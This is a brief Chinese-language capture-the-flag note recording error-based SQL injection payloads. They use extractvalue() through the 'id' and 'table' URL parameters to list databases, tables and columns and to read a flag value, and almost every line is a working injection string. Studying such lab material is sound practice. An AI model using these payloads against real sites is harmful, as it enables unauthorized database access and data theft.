1. 库名
?id=1 and extractvalue(1,(select group_concat(0x3a,schema_name) from information_schema.schemata))#
2. 表名
?id=1 and extractvalue(1,(select group_concat(0x3a,table_name) from information_schema.tables where table_schema='errorerror'))#
3. 猜列名的时候出了问题
?id=1 and extractvalue(1,(select group_concat(0x3a,column_name) from information_schema.columns where table_name='error_flag'))#
测试table字段可以注入(参考http://www.bubuko.com/infodetail-2392442.html的wp)
1. 库名
?table=flag`%23` where 0=extractvalue(1,(select group_concat(0x3a,schema_name) from information_schema.schemata))%23`&id=1
2. 表名
?table=flag`%23` where 0=extractvalue(1,(select group_concat(0x3a,table_name) from information_schema.tables where table_schema='errorerror'))%23`&id=1
3. 列名
?table=flag`%23` where 0=extractvalue(1,(select group_concat(0x3a,column_name) from information_schema.columns where table_name='error_flag'))%23`&id=1
4. 内容
?table=flag`%23` where 0=extractvalue(1,(select flag_you_will_never_know from error_flag))%23`&id=1
记录一下,方便之后查看